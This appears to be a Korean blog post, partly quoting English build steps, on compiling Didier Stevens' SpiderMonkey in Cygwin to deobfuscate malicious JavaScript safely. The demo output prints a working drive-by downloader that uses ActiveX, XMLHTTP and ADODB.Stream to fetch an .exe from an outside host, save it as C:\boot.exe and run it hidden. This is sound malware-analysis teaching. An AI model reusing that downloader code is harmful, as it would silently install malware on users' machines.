악성 스크립트 분석 시 그냥 수정 후 웹브라우져에서 확인을 해도 되지만 혹시 모를 위험 때문에 SpiderMonkey를 이용할 수 있다.
리눅스 환경에서는 yum install js-devel 명령어 하나로 간단하게 설치하여 사용할 수 있다.
윈도우 환경에서 사용할 방법을 찾다보니 cygwin 에서 컴파일 하여 사용이 가능함을 알 수 있었다.
-
Install Cygwin with gcc and standard C libraries.
-
Download and untar Stevens' SpiderMonkey source tarball.
-
In js/src/config/Linux_All.mk find the line that begins with MKSHLIB and change the ld linker syntax by replacing '-shared' with '-r':
$ grep -n MKSHLIB config/Linux_All.mk 50:MKSHLIB = $(LD) -shared $(XMKSHLIBOPTS)
-
Build using make with the following syntax:
$ make -f Makefile.ref OS_ARCH='Linux' -k
We're essentially lying to make to get it to build as if our Cygwin environment is a Linux box. This is why shared linking breaks. But it should be a non-issue.
-
The make will exit with errors, but if all went well, the JavaScript shell, js.exe, has already been built:
$ cd Linux_All_DBG.OBJ $ ls -l js.exe -rwxr-xr-x 1 nobody None 1493267 Dec 27 17:40 js.exe $ cp js.exe /bin/ $ ./js.exe js> document.write("oh word!"); js> ^C $ cat write.log oh word!
설치 후 아래와 같이 이용할 수 있다.
C:\Users\ByJJoon\Downloads\Test>wget http://handlers.sans.org/dwesemann/decode/example.js
--2010-05-08 04:35:00-- http://handlers.sans.org/dwesemann/decode/example.js
Resolving handlers.sans.org... 74.208.112.68
Connecting to handlers.sans.org|74.208.112.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3608 (3.5K) [application/x-javascript]
Saving to: `example.js'
100%[==============================================================================>] 3,608 --.-K/s in 0s
2010-05-08 04:35:00 (23.6 MB/s) - `example.js' saved [3608/3608]
C:\Users\ByJJoon\Downloads\Test>js example.js
var url,path;url="http://cool.47555.om/1xxxx.exe";path="C:\\boot.exe";try{var ado=(document.createElement("object"));var d=1;ado.setAttribute("classid","clsid:BD96C776-65A3-11D0-983A-00C04FC29E36");var e=1;var xml=ado.CreateObject("Microsoft.XMLHTTP","");var f=1;var ab="Adodb.";var cd="Stream";var g=1;var as=ado.createobject(ab+cd,"");var h=1;xml.Open("GET",url,0);xml.Send();as.type=1;var n=1;as.open();as.write(xml.responseBody);as.savetofile(path,2);as.close();var shell=ado.createobject("Shell.Application","");shell.ShellExecute(path,"","","open",0);}catch(e){};
C:\Users\ByJJoon\Downloads\Test>
출처 : http://pmelson.blogspot.com/2007/12/building-didier-stevens-spidermonkey-in.html